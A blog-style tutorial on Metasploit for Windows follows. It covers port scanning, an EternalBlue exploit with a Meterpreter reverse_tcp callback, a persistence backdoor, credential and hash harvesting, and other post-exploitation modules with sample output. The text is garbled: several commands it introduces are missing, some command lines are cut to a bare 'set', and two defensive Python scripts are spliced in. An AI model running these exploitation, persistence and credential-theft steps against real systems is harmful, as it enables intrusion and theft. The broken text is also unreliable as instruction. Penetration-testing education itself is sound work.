
Metasploit for Windows


Insha


Metasploit for Windows is a penetration testing framework that allows security professionals to exploit vulnerabilities in Windows systems. It provides a collection of tools, exploits, and payloads that can be used to test the security of Windows hosts. By identifying and leveraging security gaps, Metasploit enables security teams to gain access, test defenses, and understand potential security risks within a Windows environment.

This blog covers using Metasploit on Windows, including setup, essential commands, and the pre- and post-exploitation phases.

Why Use Metasploit on Windows?

Using Metasploit on Windows offers several advantages for penetration testing and security assessments. Windows provides a familiar and user-friendly interface, making it easier for users who are already comfortable with the platform. Metasploit’s compatibility with Windows allows seamless integration with other tools and applications native to the operating system.

Additionally, Windows environments are common in enterprise networks, so running Metasploit on Windows can simulate real-world attacks more accurately. This setup also enables testing in mixed-OS environments, where both Windows and Linux systems may be present, enhancing the scope of penetration testing.

Setting up Metasploit on Windows

To set up Metasploit on Windows, ensure the system meets the following hardware and software requirements: at least 4GB of RAM, 1GB of available disk space, and Windows 7 or later. Download the Metasploit installer from the official Rapid7 website and run the file to begin the installation.

Follow the prompts to choose the installation path and the necessary options. After installation, configure the environment for optimal performance, including setting up the database and environment variables. To initialize the database, open a command prompt or the Metasploit Console and run the following command:

This command starts the PostgreSQL database, which Metasploit relies on to store and manage data collected during penetration testing activities. After the database is initialized, verify the connection to ensure proper setup before beginning any tests.

Essential Metasploit Commands for Windows

Here are some essential Metasploit commands for Windows that every penetration tester should know:

msfconsole

This command starts the Metasploit Framework console, giving access to a wide range of exploits and tools.

search <keyword>

It helps find modules related to a particular vulnerability or attack type. Replace <keyword> with specific terms to narrow the search.

use exploit/<exploit_name>

Selects a specific exploit module from the Metasploit library. Replace <exploit_name> with the name of the exploit.

set RHOST <target_ip>

Sets the remote host (target IP) where the exploit will be directed. Replace <target_ip> with the IP address of the target.

set

exploit

Executes the selected exploit against the target with the defined parameters and payload.

sessions -i <session_id>

Lists and interacts with active sessions opened by successful exploits. Use <session_id> to specify a particular session to control.

sessions -i

By understanding and using these commands, security teams can effectively navigate the Metasploit console to exploit vulnerabilities in a target system.

Pre-Exploitation

Pre-exploitation is the phase in penetration testing where security professionals gather detailed information about the target system to identify potential vulnerabilities and attack vectors. This phase involves reconnaissance and scanning activities to map the target’s network, services, and applications. Key tasks include identifying open ports, active services, operating system details, and potential entry points such as weak authentication mechanisms or outdated software versions.

Information Gathering

Information gathering forms the foundation of successful penetration testing, enabling security professionals to collect crucial data about the target system and network.

Network Scanning

To perform a network scan and identify live hosts and open ports, use the following command:

use auxiliary/scanner/portscan/tcp
set RHOSTS <target_range>
set PORTS 1-65535

This command initiates a TCP port scan over the specified range (RHOSTS). It defines the range of ports (e.g., 1-65535) with PORTS and executes the scan to discover open ports.
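On the defending side, a sweep like this shows up in host firewall logs as one source touching many distinct destination ports within a short time. The detector below is an added example, not part of the original article or of Metasploit; it assumes the field order of the Windows Firewall log (pfirewall.log), and the addresses, window, threshold and log lines are constructed.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

HEADER = ("#Fields: date time action protocol src-ip dst-ip src-port dst-port "
          "size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path")
COLS = HEADER.split()[1:]

def parse_line(line):
    """Return (timestamp, src, dst, dst_port) for a TCP record, else None."""
    parts = line.split()
    if line.startswith("#") or len(parts) < 8:
        return None
    rec = dict(zip(COLS, parts))
    if rec["protocol"] != "TCP" or not rec["dst-port"].isdigit():
        return None
    ts = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
    return ts, rec["src-ip"], rec["dst-ip"], int(rec["dst-port"])

def detect_port_scans(lines, window=timedelta(seconds=60), threshold=100):
    """Flag (src, dst) pairs that hit >= threshold distinct TCP ports within
    a sliding window. Assumes the log is in chronological order."""
    recent = defaultdict(deque)                        # pair -> (ts, port) in window
    in_window = defaultdict(lambda: defaultdict(int))  # pair -> port -> hits
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ts, src, dst, port = rec
        pair, q, ports = (src, dst), recent[(src, dst)], in_window[(src, dst)]
        q.append((ts, port))
        ports[port] += 1
        while ts - q[0][0] > window:                   # expire records outside window
            _, old = q.popleft()
            ports[old] -= 1
            if ports[old] == 0:
                del ports[old]
        if len(ports) >= threshold and pair not in alerts:
            alerts[pair] = {"first_seen": q[0][0], "detected": ts,
                            "distinct_ports": len(ports)}
    return alerts

def build_sample_log():
    """Constructed log: one host sweeping ports 1-300, one ordinary HTTPS client."""
    t0, lines = datetime(2024, 1, 1, 12, 0, 0), [HEADER]
    for port in range(1, 301):                         # about 10 probes per second
        ts = t0 + timedelta(seconds=port // 10)
        lines.append(f"{ts:%Y-%m-%d %H:%M:%S} DROP TCP 10.0.0.50 10.0.0.20 "
                     f"{40000 + port} {port} 52 S 0 0 8192 - - - RECEIVE")
    for i in range(20):
        ts = t0 + timedelta(seconds=2 * i)
        lines.append(f"{ts:%Y-%m-%d %H:%M:%S} ALLOW TCP 10.0.0.31 10.0.0.20 "
                     f"{50000 + i} 443 52 S 0 0 8192 - - - RECEIVE")
    return sorted(lines)                               # '#' header sorts first

if __name__ == "__main__":
    for pair, hit in detect_port_scans(build_sample_log()).items():
        print(pair, hit["distinct_ports"], hit["detected"])
```

A slow scan that stays under the threshold inside every window is not flagged, so the window and threshold need tuning against the normal traffic of the monitored host.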

Service Fingerprinting

To identify services running on discovered hosts, use this command:

use auxiliary/scanner/http/http_version
set

This auxiliary module fingerprints HTTP services. It uses RHOSTS to specify the target range and provides detailed information on HTTP versions and server details for each host in the range when executed.

Windows Exploits

To find exploits for Windows, use the following command in Metasploit:

This command searches for all available Windows exploits within the Metasploit Framework. It helps to quickly identify which exploits are relevant to the target's platform.

Once an exploit is identified, configure and prepare it for use:

use exploit/windows/smb/ms17_010_eternalblue
set RHOST <target_ip>
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST <your_ip>
set

The use command loads the specified exploit module. The set RHOST command specifies the target's IP, and set PAYLOAD determines how the reverse connection is established. LHOST is set to your IP to receive the connection, and LPORT defines the listening port.

Finally, execute the exploit:

This command runs the configured exploit against the specified target, attempting to exploit the vulnerability and deliver the payload.

Post-Exploitation

Post-exploitation is the phase in penetration testing that occurs after gaining initial access to a system. During this phase, the focus shifts from breaking into the system to understanding the scope and impact of the compromise. Security professionals attempt to escalate privileges, move laterally across the network, and gather sensitive data like passwords, files, or confidential information.

Payloads

Payloads and post-exploitation techniques allow attackers to maintain access and extract valuable information from compromised systems. Let’s explore various payload types and post-exploitation methods available in Metasploit for Windows.

Types of Payloads

In Metasploit, you can choose various payloads to deliver the exploit. For example, to use the Meterpreter reverse TCP payload, use this command:

This command selects the reverse_tcp payload, which creates a reverse connection from the target system to the attacker's machine, providing a Meterpreter shell.

Using Meterpreter

After exploiting a target, Meterpreter allows advanced control over the system:

sessions -i

sessions -i interacts with the open session. sysinfo shows system details, and getuid retrieves the user ID of the session.

Persistence and Data Extraction

For maintaining access and extracting data:

run persistence -U -i 5 -p <your_port> -r

The run persistence command sets up a persistent backdoor that reconnects every 5 minutes. The download command fetches files from the compromised system and sends them to the local machine.

Metasploit Post-Exploitation Modules

Metasploit provides several post-exploitation modules that security teams can use to gather more information about the target network.

arp_scanner

Use the arp_scanner post module to perform an ARP scan for a specified range through a compromised host. This module helps discover other devices on the network.

meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24

[*] Running module against V-MAC-XP
[*] ARP Scanning 192.168.1.0/24
[*] 	IP: 192.168.1.1 MAC b2:a8:1d:e0:68:89
[*] 	IP: 192.168.1.2 MAC 0:f:b5:fc:bd:22
[*] 	IP: 192.168.1.11 MAC 0:21:85:fc:96:32
[*] 	IP: 192.168.1.13 MAC 78:ca:39:fe:b:4c
[*] 	IP: 192.168.1.100 MAC 58:b0:35:6a:4e:cc
[*] 	IP: 192.168.1.101 MAC 0:1f:d0:2e:b5:3f
[*] 	IP: 192.168.1.102 MAC 58:55:ca:14:1e:61
[*] 	IP: 192.168.1.105 MAC 0:1:6c:6f:dd:d1
[*] 	IP: 192.168.1.106 MAC c:60:76:57:49:3f
[*] 	IP: 192.168.1.195 MAC 0:c:29:c9:38:4c
[*] 	IP: 192.168.1.194 MAC 12:33:a0:2:86:9b
[*] 	IP: 192.168.1.191 MAC c8:bc:c8:85:9d:b2
[*] 	IP: 192.168.1.193 MAC d8:30:62:8c:9:ab
[*] 	IP: 192.168.1.201 MAC 8a:e9:17:42:35:b0
[*] 	IP: 192.168.1.203 MAC 3e:ff:3c:4c:89:67
[*] 	IP: 192.168.1.207 MAC c6:b3:a1:bc:8a:ec
[*] 	IP: 192.168.1.199 MAC 1c:c1:de:41:73:94
[*] 	IP: 192.168.1.209 MAC 1e:75:bd:82:9b:11
[*] 	IP: 192.168.1.220 MAC 76:c4:72:53:c1:ce
[*] 	IP: 192.168.1.221 MAC 0:c:29:d7:55:f
[*] 	IP: 192

The command meterpreter > run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24 initiates an ARP scan across the specified subnet (192.168.1.0/24). It identifies active devices within that range, displaying their IP and MAC addresses. The arp_scanner module within Metasploit's Meterpreter session provides a quick way to map devices on the local network, useful for identifying potential targets or understanding the network topology.

checkvm

With the checkvm post module, you can determine if the compromised host is running on a virtual machine. This module supports Hyper-V, VMware, VirtualBox, Xen, and QEMU virtual machines.

meterpreter > run post/windows/gather/checkvm

[*] Checking if

The command meterpreter > run post/windows/gather/checkvm is used to determine if the compromised system is running within a virtual machine (VM). In this example, it checks the machine and confirms that it is a VMware virtual machine. Identifying the presence of a VM is important for understanding the environment, as penetration testers and attackers may adjust their techniques if they detect a virtualized environment.

credential_collector

The credential_collector module allows you to harvest password hashes and tokens from the compromised host. This is useful for further exploitation and lateral movement.



The command meterpreter > run post/windows/gather/credentials/credential_collector is used to collect credentials from the target Windows machine. It extracts password hashes and security tokens from the system.

In this case, the command retrieves NTLM hashes for various user accounts, such as Administrator and Guest. It also lists available tokens for different system services like LOCAL SERVICE and SYSTEM. The collected credentials can be used for further attacks, such as privilege escalation or lateral movement within a network.

dumplinks

By using the dumplinks module, you can parse the .lnk files in a user's Recent Documents folder. This information can be valuable for understanding the user's recent activity. Note that you must first migrate into a user process before running this module.

meterpreter > run post/windows/manage/migrate

[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1096)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 1824
[*] New server process: Explorer.EXE (1824)
meterpreter > run post/windows/gather/dumplinks

[*] Running module against V-MAC-XP
[*] Extracting lnk files for user Administrator at C:\Documents and Settings\Administrator\Recent\...
[*] Processing: C:\Documents and Settings\Administrator\Recent\developers_guide.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\documentation.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Local Disk (C).lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Netlog.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\notes (2).lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\notes.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\Release.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\testmachine_crashie.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\user manual.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\user's guide.lnk.
[*] Processing: C:\Documents and Settings\Administrator\Recent\{33D9A762-90C8-11d0-BD43-00A0C911CE86}_load.lnk.
[*] No Recent Office files found for user Administrator. Nothing to do.
meterpreter >

The meterpreter > run post/windows/manage/migrate command migrates the Meterpreter session from its current process (svchost.exe) to a more stable one like explorer.exe. This process migration is done to maintain access and avoid detection, as explorer.exe is less likely to be terminated by system defenses.

The meterpreter > run post/windows/gather/dumplinks command gathers .lnk (shortcut) files from the Recent folder of a specific user (in this case, Administrator). This allows the tester to see recently accessed files, potentially revealing sensitive information or user activity that could aid in further exploitation.

enum_applications

The enum_applications module enumerates the applications installed on the compromised host. This helps in identifying potential targets for further exploitation.

meterpreter > run post/windows/gather/enum_applications

[*] Enumerating applications installed on WIN7-X86

Installed Applications
======================

 Name                                                              Version
 ----                                                              -------
 Adobe Flash Player 25 ActiveX                                     25.0.0.148
 Google Chrome                                                     58.0.3029.81
 Google Update Helper                                              1.3.33.5
 Google Update Helper                                              1.3.25.11
 Microsoft .NET Framework 4.6.1                                    4.6.01055
 Microsoft .NET Framework 4.6.1                                    4.6.01055
 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148    9.0.30729.4148
 MySQL Connector Net 6.5.4                                         6.5.4
 Security Update for Microsoft .NET Framework 4.6.1 (KB3122661)    1
 Security Update for Microsoft .NET Framework 4.6.1 (KB3127233)    1
 Security Update for Microsoft .NET Framework 4.6.1 (KB3136000v2)  2
 Security Update for Microsoft .NET Framework 4.6.1 (KB3142037)    1
 Security Update for Microsoft .NET Framework 4.6.1 (KB3143693)    1
 Security Update for Microsoft .NET Framework 4.6.1 (KB3164025)    1
 Update for Microsoft .NET Framework 4.6.1 (KB3210136)             1
 Update for Microsoft .NET Framework 4.6.1 (KB4014553)             1
 VMware Tools                                                      10.1.6.5214329
 XAMPP 1.8.1-0                                                     1.8.1-0

[*] Results stored in

The output of the run post/windows/gather/enum_applications command shows a list of installed applications on the compromised Windows machine (WIN7-X86). Each application is listed by name and version, which can help the attacker identify potentially vulnerable software to exploit further. For example, outdated versions of Adobe Flash Player, Google Chrome, .NET Framework, and other programs may have known vulnerabilities. Security updates and patches for .NET Framework are also listed, providing a full overview of the software environment. The results are saved in a file for further review.

enum_logged_on_users

You can use the enum_logged_on_users post module to get a list of current and recently logged-on users, along with their SIDs. This information is useful for understanding user activity and privileges.

meterpreter > run post/windows/gather/enum_logged_on_users

[*] Running against session 1

Current Logged Users
====================

 SID                                            User
 ---                                            ----
 S-1-5-21-628913648-3499400826-3774924290-1000  WIN7-X86\victim
 S-1-5-21-628913648-3499400826-3774924290-1004  WIN7-X86\hacker

[*] Results saved in: /root/.msf4/loot/20170501172925_pwk_192.168.0.6_host.users.activ_736219.txt

Recently Logged Users
=====================

 SID                                            Profile Path
 ---                                            ------------

The run post/windows/gather/enum_logged_on_users command in Meterpreter identifies both the currently active and recently logged-on users on a Windows system. It provides the SID (Security Identifier) and User for active sessions, indicating which accounts are logged in.

It also lists recently logged-on users with their profile paths, including both user and system accounts like LocalService and NetworkService. This information is saved to a file for further analysis, offering insight into the users who have accessed the machine.

usb_history

By using the usb_history module, you can enumerate the USB drive history on the compromised system. This helps in identifying removable drives that have been connected to the system.

meterpreter > run post/windows/gather/usb_history

[*] Running module against V-MAC-XP
[*]
   C:	                                                             Disk ea4cea4c
   E:	STORAGE#RemovableMedia#8&3a01dffe&0&RM#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
   A:	FDC#GENERIC_FLOPPY_DRIVE#6&1435b2e2&0&0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
   D:	IDE#CdRomNECVMWar_VMware_IDE_CDR10_______________1.00____#3031303030303030303030303030303030303130#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

[*] Kingston DataTraveler 2.0 USB Device
=====================================================================================
   Disk lpftLastWriteTime	                    Thu Apr 21 13:09:42 -0600 2011
 Volume lpftLastWriteTime	                    Thu Apr 21 13:09:43 -0600 2011
             Manufacturer	                            (Standard disk drives)
           ParentIdPrefix	                                      8&3a01dffe&0 (   E:)
                    Class	                                         DiskDrive
                   Driver	       {4D36E967-E325-11CE-BFC1-08002BE10318}\0001

The output of run post/windows/gather/usb_history in Metasploit provides details about the USB devices that have been connected to the target machine. It includes information like the drive letters assigned (e.g., C:, E:), the device types (e.g., removable media, disk drives), and specific details such as the manufacturer, last write times, and volume information. This data can help trace the usage of USB devices and identify external drives connected to the system, which could be useful in forensic analysis or incident response scenarios.
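For the forensic use mentioned above, the drive-letter entries and the device section can be tied together through ParentIdPrefix, which matches the start of the instance field in the mounted-device path. The parser below is an added example, not code from the article or from Metasploit; it runs on an abridged copy of the output shown above, and its function names are hypothetical.

```python
import re
from datetime import datetime

# usb_history output from the article, abridged, whitespace normalised.
SAMPLE = r"""
[*] Running module against V-MAC-XP
[*]
   C:    Disk ea4cea4c
   E:    STORAGE#RemovableMedia#8&3a01dffe&0&RM#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
   A:    FDC#GENERIC_FLOPPY_DRIVE#6&1435b2e2&0&0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

[*] Kingston DataTraveler 2.0 USB Device
=====================================================================================
   Disk lpftLastWriteTime    Thu Apr 21 13:09:42 -0600 2011
 Volume lpftLastWriteTime    Thu Apr 21 13:09:43 -0600 2011
           ParentIdPrefix    8&3a01dffe&0 (   E:)
                   Driver    {4D36E967-E325-11CE-BFC1-08002BE10318}\0001
"""

def parse_device_path(path):
    """Split ENUMERATOR#DEVICE#INSTANCE#{GUID}; keep other values raw."""
    f = path.split("#")
    if len(f) != 4:
        return {"raw": path}
    return {"raw": path, "enumerator": f[0], "device": f[1],
            "instance": f[2], "interface_guid": f[3].strip("{}")}

def parse_usb_history(text):
    """Return (mounts keyed by drive letter, list of device sections)."""
    mounts, devices, banner, current = {}, [], None, None
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("[*]"):
            banner, current = line[3:].strip(), None
        elif line and set(line) == {"="}:        # underline opens a device section
            current = {"name": banner, "attrs": {}}
            devices.append(current)
        elif current is None:
            m = re.match(r"([A-Z]):\s+(.+)$", line)
            if m:
                mounts[m.group(1)] = parse_device_path(m.group(2))
        else:
            kv = re.split(r"\t\s*|\s{2,}", line, maxsplit=1)
            if len(kv) == 2:
                current["attrs"][kv[0]] = kv[1]
    return mounts, devices

def usb_timeline(text):
    """Link each device to its drive letter(s) via ParentIdPrefix; ISO timestamps."""
    mounts, devices = parse_usb_history(text)
    rows = []
    for dev in devices:
        a = dev["attrs"]
        prefix = a.get("ParentIdPrefix", "").split(" ")[0]
        drives = sorted(d for d, m in mounts.items()
                        if prefix and m.get("instance", "").startswith(prefix))
        seen = a.get("Disk lpftLastWriteTime")
        when = datetime.strptime(seen, "%a %b %d %H:%M:%S %z %Y").isoformat() if seen else None
        rows.append({"device": dev["name"], "drives": drives, "disk_last_write": when})
    return rows
```

Calling usb_timeline(SAMPLE) yields one row per device section with ISO 8601 timestamps that can be merged into an incident timeline alongside other host artifacts.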

Final Thoughts

Mastering Metasploit significantly boosts penetration testing capabilities by offering a comprehensive suite of tools for various phases of testing, from information gathering to exploitation and post-exploitation.

Utilizing its vast array of modules, testers can efficiently identify vulnerabilities and launch targeted attacks. To conduct effective penetration tests, it is essential to thoroughly understand Metasploit’s functionalities and apply them strategically. Regular practice, combined with the exploration of new modules and features, is crucial for refining skills. Staying updated on the latest vulnerabilities and exploits ensures that testers can respond proactively to emerging threats, maximizing the impact of their assessments.
